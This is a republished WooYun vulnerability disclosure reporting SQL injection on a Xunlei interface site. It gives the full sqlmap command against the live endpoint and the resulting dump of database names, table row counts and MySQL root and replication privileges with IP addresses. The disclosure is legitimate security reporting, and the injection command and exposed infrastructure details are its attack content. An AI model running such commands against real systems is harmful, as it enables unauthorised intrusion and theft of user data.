迅雷某站两处以上SQL注入/报错/联合查询/含业务信息用户数据/惊现知乎数据/dba权限

admin
admin
admin
139598
文章
114
评论
2017年4月22日13:16:29评论225 views字数 229阅读0分45秒阅读模式
摘要

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-08: 厂商已经确认,细节仅向厂商公开
2016-04-18: 细节向核心白帽子及相关领域专家公开
2016-04-28: 细节向普通白帽子公开
2016-05-08: 细节向实习白帽子公开
2016-05-23: 细节向公众公开

漏洞概要 关注数(11) 关注此漏洞

缺陷编号: WooYun-2016-193838

漏洞标题: 迅雷某站两处以上SQL注入/报错/联合查询/含业务信息用户数据/惊现知乎数据/dba权限

相关厂商: 迅雷

漏洞作者: hear7v

提交时间: 2016-04-08 14:16

公开时间: 2016-05-23 15:20

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 注入

1人收藏

漏洞详情

披露状态:

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-08: 厂商已经确认,细节仅向厂商公开
2016-04-18: 细节向核心白帽子及相关领域专家公开
2016-04-28: 细节向普通白帽子公开
2016-05-08: 细节向实习白帽子公开
2016-05-23: 细节向公众公开

简要描述:

迅雷某站两处以上注入,报错,联合,单表数据量千万,总量很大,含业务信息用户数据,惊现知乎数据

详细说明:

python sqlmap.py -u "http://interface.k.xunlei.com/mobile_promote/manage/self_gets?operator=no_limit&user_type=100&version=2.0.2.16&province=no_limit&system_type=2?chanel&umeng-10900010&client_type=android-swjsq-2.0.2.16&peerid=EC1D7F9DADB8004V&time_and=1460018261265&client_version=androidswjsq-2.0.2.16&os=android-5.1.22ZTEQ519T" --user-agent "Dalvik/2.1.0 (Linux; U; Android 5.1; ZTE Q519T Build/LMY47D)"

漏洞证明:

Database: stat

+---------------------------------------+---------+

| Table | Entries |

+---------------------------------------+---------+

| speep_vip2_uids | 9537056 |

| t_user_vas_20151119 | 8380318 |

| action_data | 1872421 |

| gift_o | 1612178 |

| speed_stat_by_min | 1530678 |

| formal_speed_uid_history | 1395435 |

| gift | 1004079 |

| vip_history | 975731 |

| uid2kn | 847758 |

| speed_stat_by_min_bac | 643706 |

| portal_stat_by_min | 612048 |

| t_user_vas | 445839 |

| zhifu_history | 405635 |

| speep_uids | 312878 |

| query_client_version_stat_daily | 252835 |

| speed_stat_by_min_tem | 55570 |

| zhifu_stat | 43920 |

| analyse_province_speed | 39165 |

| tem_kuainiao_user_state | 33355 |

| analyse_speed_proxy_status | 23210 |

| xl7_stat_daily | 19824 |

| analyse_feedback_codeinfo | 16912 |

| plugin_conversion_stat | 16749 |

| analyse_client_speed | 9429 |

| user_ana | 9360 |

| query_province_stat_daily | 7966 |

| pc_user_version_count_pid | 6682 |

| zhifu_stat_bac_1122 | 4685 |

| zhifu_history_1117 | 4141 |

| analyse_operator_speed | 4017 |

| user_count_daily | 3882 |

| zhifu_history_20151120 | 3291 |

| user_ana_bac | 3159 |

| query_client_stat_daily | 2347 |

| stat | 1895 |

| sys_user_pms | 1822 |

| speed_time_stat_daily | 1795 |

| analyse_speed | 1119 |

| query_operator_stat_daily | 987 |

| sys_log | 856 |

| speed_ok_identity_stat | 779 |

| zhifu_stat_desc | 768 |

| zhifu_history_batch | 649 |

| zhifu_open_cycle_stat | 644 |

| pc_user_count_pid | 290 |

| android_user_count_pid | 282 |

| ios_user_count_pid | 282 |

| plugin_speed_stat | 252 |

| query_all_stat_daily | 251 |

| zhifu_open_cycle_client_stat | 161 |

| data_user_event_day_login | 157 |

| member_count_stat | 80 |

| sys_menu | 77 |

| client_jiaoji | 63 |

| xl7_stat_id2property | 63 |

| action_type | 51 |

| sys_user_upwd_log | 50 |

| sys_user | 41 |

| dial_repeat_count_sum | 31 |

| dial_repeat_count_sum_bac | 31 |

| uid_repeat_count_sum | 31 |

| member_reserved_stat | 30 |

| plugin | 22 |

| ci_sessions | 14 |

| zhifu_client | 12 |

| client_type | 9 |

| setup_consumers | 8 |

| performance_timers | 5 |

| setup_timers | 1 |

+---------------------------------------+---------+

Database: mysql

+---------------------------------------+---------+

| Table | Entries |

+---------------------------------------+---------+

| help_relation | 1029 |

| help_topic | 508 |

| help_keyword | 465 |

| help_category | 38 |

| `user` | 8 |

| db | 4 |

| proxies_priv | 2 |

+---------------------------------------+---------+

Database: global

+---------------------------------------+---------+

| Table | Entries |

+---------------------------------------+---------+

| pc_promote_uid_14 | 130000 |

| mobile_promote | 23 |

| pc_promote | 10 |

+---------------------------------------+---------+

Database: interface

+---------------------------------------+---------+

| Table | Entries |

+---------------------------------------+---------+

| bind_record | 1 |

+---------------------------------------+---------+

Database: query_log

+---------------------------------------+---------+

| Table | Entries |

+---------------------------------------+---------+

| query_log_6_0_1 | 15787880 |

| query_log_6_0_5 | 15659917 |

| query_log_6_0_4 | 15549772 |

| query_log_6_0_6 | 15073810 |

| query_log_6_0_3 | 14976535 |

| query_log_6_0_7 | 14927479 |

| query_log_6_0_2 | 14919142 |

| query_log_8_0_1 | 13164756 |

| query_log_8_0_5 | 13140388 |

| query_log_8_0_4 | 13030371 |

| query_log_6_0_8 | 12887105 |

| query_log_6_0_9 | 12879007 |

| query_log_8_0_3 | 12654790 |

| query_log_8_0_2 | 12542332 |

| query_log_8_0_6 | 12505141 |

| query_log_8_0_7 | 12246204 |

| query_log_8_0_9 | 10856725 |

| query_log_8_0_8 | 10752162 |

| query_log_6_0_0 | 10297248 |

| query_log_6_1_1 | 10054511 |

| query_log_6_1_5 | 9998411 |

| query_log_6_1_4 | 9949178 |

| query_log_5_0_1 | 9931374 |

| query_log_6_1_2 | 9920209 |

| query_log_6_1_6 | 9776956 |

| query_log_6_1_7 | 9716618 |

| query_log_5_0_4 | 9263860 |

| query_log_5_0_5 | 9212598 |

| query_log_5_0_2 | 8976801 |

| query_log_5_0_3 | 8972922 |

| query_log_5_0_6 | 8662356 |

| query_log_6_1_3 | 8551096 |

| query_log_5_0_7 | 8548397 |

| query_log_8_0_0 | 8492903 |

| query_log_6_1_8 | 8321503 |

| query_log_6_1_9 | 8309844 |

| query_log_8_1_2 | 8121264 |

| query_log_8_1_3 | 8119303 |

| query_log_8_1_1 | 8048653 |

| query_log_8_1_5 | 8046545 |

| query_log_8_1_4 | 7990767 |

| query_log_8_1_6 | 7899025 |

| query_log_5_0_9 | 7871072 |

| query_log_8_1_7 | 7699257 |

| query_log_5_0_8 | 7484770 |

| query_log_7_0_1 | 7232183 |

| query_log_7_0_3 | 7197931 |

| query_log_7_0_2 | 7188413 |

| query_log_7_0_6 | 7122009 |

| query_log_7_0_5 | 7057586 |

| query_log_7_0_4 | 7007013 |

| query_log_6_1_0 | 6891653 |

| query_log_7_0_7 | 6878064 |

| query_log_8_1_9 | 6692157 |

| query_log_8_1_8 | 6675937 |

| query_log_5_0_0 | 6259222 |

| query_log_7_0_9 | 5927197 |

| query_log_7_0_8 | 5911811 |

| query_log_5_1_1 | 5866282 |

| query_log_5_1_2 | 5599932 |

| query_log_5_1_3 | 5548525 |

| query_log_8_1_0 | 5535330 |

| query_log_5_1_4 | 5456733 |

| query_log_5_1_5 | 5447971 |

| query_log_5_1_6 | 5285942 |

| query_log_5_1_7 | 5194566 |

| query_log_7_1_2 | 5035024 |

| query_log_7_0_0 | 5017385 |

| query_log_7_1_3 | 4979573 |

| query_log_7_1_1 | 4941787 |

| query_log_7_1_6 | 4828147 |

| query_log_7_1_5 | 4820992 |

| query_log_7_1_4 | 4785544 |

| query_log_5_1_9 | 4716656 |

| query_log_7_1_7 | 4697270 |

| query_log_5_1_8 | 4460258 |

| query_log_7_1_9 | 4072142 |

| query_log_7_1_8 | 4047269 |

| query_log_5_1_0 | 3989968 |

| query_log_7_1_0 | 3495220 |

| query_log_1_1_1 | 2063681 |

| query_log_1_1_3 | 1814603 |

| query_log_1_1_5 | 1807892 |

| query_log_1_1_4 | 1804971 |

| query_log_1_1_2 | 1804780 |

| query_log_1_1_6 | 1788879 |

| query_log_1_1_7 | 1763480 |

| query_log_1_0_4 | 220031 |

| query_log_1_0_7 | 217451 |

| query_log_0_0_4 | 214727 |

| query_log_0_0_1 | 212659 |

| query_log_0_0_2 | 212013 |

| query_log_0_0_5 | 211494 |

| query_log_0_1_3 | 207579 |

| query_log_0_0_6 | 206062 |

| query_log_1_0_2 | 205414 |

| query_log_0_1_2 | 204220 |

| query_log_0_1_1 | 200441 |

| query_log_0_0_7 | 196351 |

| query_log_0_1_5 | 194458 |

| query_log_0_1_4 | 190959 |

| query_log_0_1_6 | 189722 |

| query_log_1_0_3 | 187603 |

| query_log_0_0_9 | 175362 |

| query_log_0_1_7 | 174263 |

| query_log_0_0_8 | 173752 |

| query_log_1_0_8 | 169640 |

| query_log_0_1_9 | 162532 |

| query_log_0_1_8 | 162062 |

| query_log_1_0_9 | 160289 |

| query_log_0_1_0 | 138533 |

| query_log_0_0_0 | 138078 |

| query_log_1_0_0 | 129620 |

| query_log_9_1_2 | 122008 |

| query_log_9_1_3 | 118684 |

| query_log_9_1_6 | 112011 |

| query_log_9_1_4 | 110003 |

| query_log_9_1_5 | 109181 |

| query_log_9_0_2 | 106242 |

| query_log_9_1_7 | 105667 |

| query_log_9_0_3 | 105029 |

| query_log_9_0_4 | 98779 |

| query_log_9_0_5 | 97967 |

| query_log_9_0_6 | 97258 |

| query_log_9_1_1 | 92556 |

| query_log_9_1_9 | 91470 |

| query_log_9_0_7 | 91244 |

| query_log_9_1_8 | 90170 |

| query_log_9_0_1 | 87259 |

| query_log_9_0_9 | 81944 |

| query_log_9_0_8 | 80688 |

| query_log_9_1_0 | 77087 |

| query_log_9_0_0 | 64291 |

| query_log_2_1_2 | 45687 |

| query_log_2_1_3 | 45613 |

| query_log_2_1_6 | 44156 |

| query_log_2_1_4 | 43996 |

| query_log_2_1_7 | 43580 |

| query_log_2_1_1 | 43233 |

| query_log_2_1_8 | 37270 |

| query_log_2_1_9 | 36839 |

| query_log_2_1_5 | 36600 |

| query_log_4_1_2 | 33372 |

| query_log_4_1_4 | 33129 |

| query_log_4_1_5 | 33041 |

| query_log_4_1_6 | 32879 |

| query_log_4_1_7 | 32644 |

| query_log_4_1_1 | 32613 |

| query_log_2_1_0 | 31347 |

| query_log_4_1_3 | 29328 |

| query_log_4_1_8 | 27084 |

| query_log_4_1_9 | 26897 |

| query_log_4_1_0 | 23161 |

| query_log_2_0_2 | 10909 |

| query_log_2_0_6 | 10681 |

| query_log_2_0_3 | 10551 |

| query_log_2_0_4 | 10442 |

| query_log_2_0_1 | 10151 |

| query_log_2_0_5 | 10118 |

| query_log_2_0_7 | 9564 |

| query_log_2_0_8 | 8599 |

| query_log_2_0_9 | 8540 |

| query_log_4_0_3 | 7831 |

| query_log_4_0_4 | 7580 |

| query_log_4_0_6 | 7565 |

| query_log_4_0_5 | 7227 |

| query_log_4_0_2 | 7009 |

| query_log_2_0_0 | 6832 |

| query_log_4_0_1 | 6590 |

| query_log_4_0_7 | 6491 |

| query_log_4_0_8 | 5711 |

| query_log_4_0_9 | 5542 |

| query_log_4_0_0 | 4384 |

| query_log_10_0_7 | 509 |

| query_log_10_1_7 | 287 |

| query_log_3_0_1 | 210 |

| query_log_3_0_6 | 182 |

| query_log_3_0_2 | 151 |

| query_log_3_0_5 | 144 |

| query_log_3_0_7 | 140 |

| query_log_3_0_4 | 135 |

| query_log_3_1_1 | 124 |

| query_log_3_0_3 | 123 |

| query_log_3_1_6 | 120 |

| query_log_3_1_2 | 96 |

| query_log_3_1_7 | 94 |

| query_log_3_1_4 | 89 |

| query_log_3_1_3 | 85 |

| query_log_3_1_5 | 85 |

| query_log_3_0_9 | 30 |

| query_log_11_1_7 | 24 |

| query_log_3_1_9 | 24 |

| query_log_3_0_8 | 20 |

| query_log_3_1_8 | 20 |

| query_log_3_1_0 | 15 |

| query_log_3_0_0 | 12 |

| query_log_11_0_7 | 11 |

+---------------------------------------+---------+

Database: access_log

+---------------------------------------+---------+

| Table | Entries |

+---------------------------------------+---------+

| access_log_20160404 | 7697159 |

| access_log_20160406 | 7336387 |

| access_log_20160407 | 7305092 |

| access_log_20160405 | 7259207 |

| access_log_20160331 | 5748378 |

| access_log_20160313 | 5042542 |

| access_log_20160320 | 4978698 |

| access_log_20160319 | 4927949 |

| access_log_20160312 | 4920366 |

| access_log_20160310 | 4158324 |

| access_log_20160328 | 4158209 |

| access_log_20160329 | 4157389 |

| access_log_20160227 | 4070947 |

| access_log_20160309 | 4053648 |

| access_log_20160308 | 4025162 |

| access_log_20160221 | 3944884 |

| access_log_20160304 | 3776862 |

| access_log_20160307 | 3741766 |

| access_log_20160303 | 3686839 |

| access_log_20160302 | 3669029 |

| access_log_20160226 | 3660205 |

| access_log_20160301 | 3656808 |

| access_log_20160225 | 3601496 |

| access_log_20160220 | 3595823 |

| access_log_20160229 | 3585032 |

| access_log_20160223 | 3579818 |

| access_log_20160224 | 3576439 |

| access_log_20160222 | 3549159 |

+---------------------------------------+---------+

Database: test

+---------------------------------------+---------+

| Table | Entries |

+---------------------------------------+---------+

| proxy_speed_log_20150926 | 522294 |

| proxy_speed_log_20150919 | 495252 |

| proxy_speed_log_20150920 | 478269 |

| proxy_speed_log_20150925 | 465590 |

| proxy_speed_log_20150913 | 435380 |

| proxy_speed_log_20150918 | 434254 |

| proxy_speed_log_20150912 | 433320 |

| proxy_speed_log_20150924 | 424070 |

| proxy_speed_log_20150921 | 418395 |

| proxy_speed_log_20150923 | 416164 |

| proxy_speed_log_20150922 | 407650 |

| proxy_speed_log_20150914 | 393216 |

| proxy_speed_log_20150911 | 387210 |

| proxy_speed_log_20150917 | 363995 |

| proxy_speed_log_20150915 | 355420 |

| proxy_speed_log_20150916 | 350006 |

+---------------------------------------+---------+

Database: tips

+---------------------------------------+---------+

| Table | Entries |

+---------------------------------------+---------+

| tips_uid_54 | 130000 |

| tips_pid_36 | 96494 |

| tips_pid_38 | 96494 |

| tips_pid_32 | 50000 |

| tips_pid_34 | 46492 |

| tips | 29 |

| tips_pid_22 | 4 |

| tips_pid_26 | 4 |

| tips_pid_28 | 4 |

| tips_pid_30 | 4 |

| tips_pid_18 | 3 |

| tips_pid_24 | 3 |

+---------------------------------------+---------+

Database: information_schema

+---------------------------------------+---------+

| Table | Entries |

+---------------------------------------+---------+

| COLUMNS | 2474 |

| STATISTICS | 582 |

| TABLES | 441 |

| SESSION_VARIABLES | 326 |

| GLOBAL_VARIABLES | 315 |

| GLOBAL_STATUS | 287 |

| SESSION_STATUS | 287 |

| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |

| COLLATIONS | 197 |

| KEY_COLUMN_USAGE | 129 |

| USER_PRIVILEGES | 92 |

| TABLE_CONSTRAINTS | 83 |

| PROCESSLIST | 63 |

| CHARACTER_SETS | 39 |

| PLUGINS | 17 |

| SCHEMA_PRIVILEGES | 16 |

| SCHEMATA | 10 |

| ENGINES | 6 |

| INNODB_CMP | 5 |

| INNODB_CMP_RESET | 5 |

| INNODB_CMPMEM | 5 |

| INNODB_CMPMEM_RESET | 5 |

| INNODB_TRX | 1 |

+---------------------------------------+---------+

database management system users privileges:

[*] 'nagios'@'127.0.0.1' (administrator) [2]:

privilege: REPLICATION CLIENT

privilege: SUPER

[*] 'root'@'111.161.24.187' [1]:

privilege: USAGE

[*] 'root'@'123.150.185.187' [1]:

privilege: USAGE

[*] 'root'@'127.0.0.1' (administrator) [28]:

privilege: ALTER

privilege: ALTER ROUTINE

privilege: CREATE

privilege: CREATE ROUTINE

privilege: CREATE TABLESPACE

privilege: CREATE TEMPORARY TABLES

privilege: CREATE USER

privilege: CREATE VIEW

privilege: DELETE

privilege: DROP

privilege: EVENT

privilege: EXECUTE

privilege: FILE

privilege: INDEX

privilege: INSERT

privilege: LOCK TABLES

privilege: PROCESS

privilege: REFERENCES

privilege: RELOAD

privilege: REPLICATION CLIENT

privilege: REPLICATION SLAVE

privilege: SELECT

privilege: SHOW DATABASES

privilege: SHOW VIEW

privilege: SHUTDOWN

privilege: SUPER

privilege: TRIGGER

privilege: UPDATE

[*] 'root'@'::1' (administrator) [28]:

privilege: ALTER

privilege: ALTER ROUTINE

privilege: CREATE

privilege: CREATE ROUTINE

privilege: FILE

privilege: INDEX

privilege: INSERT

privilege: LOCK TABLES

privilege: PROCESS

privilege: REFERENCES

privilege: RELOAD

privilege: REPLICATION CLIENT

privilege: REPLICATION SLAVE

privilege: SELECT

privilege: SHOW DATABASES

privilege: SHOW VIEW

privilege: SHUTDOWN

privilege: SUPER

privilege: TRIGGER

privilege: UPDATE

[*] 'root'@'localhost' (administrator) [28]:

privilege: ALTER

privilege: ALTER ROUTINE

privilege: CREATE

privilege: CREATE ROUTINE

privilege: CREATE TABLESPACE

privilege: CREATE TEMPORARY TABLES

privilege: CREATE USER

privilege: CREATE VIEW

privilege: DELETE

privilege: DROP

privilege: EVENT

privilege: EXECUTE

privilege: FILE

privilege: INDEX

privilege: INSERT

privilege: LOCK TABLES

privilege: PROCESS

privilege: REFERENCES

privilege: RELOAD

privilege: REPLICATION CLIENT

privilege: REPLICATION SLAVE

privilege: SELECT

privilege: SHOW DATABASES

privilege: SHOW VIEW

privilege: SHUTDOWN

privilege: SUPER

privilege: TRIGGER

privilege: UPDATE

[*] 'slave'@'111.161.24.187' [2]:

privilege: REPLICATION CLIENT

privilege: REPLICATION SLAVE

[*] 'slave'@'123.150.185.187' [2]:

privilege: REPLICATION CLIENT

privilege: REPLICATION SLAVE

修复方案:

过滤,这个是纯粹没有过滤,听说要送礼物

版权声明:转载请注明来源 hear7v@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-04-08 15:16

厂商回复:

感谢你的反馈,已安排人员处理。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-08 16:40 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

    1

    多给一个就是普通白猫啦

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin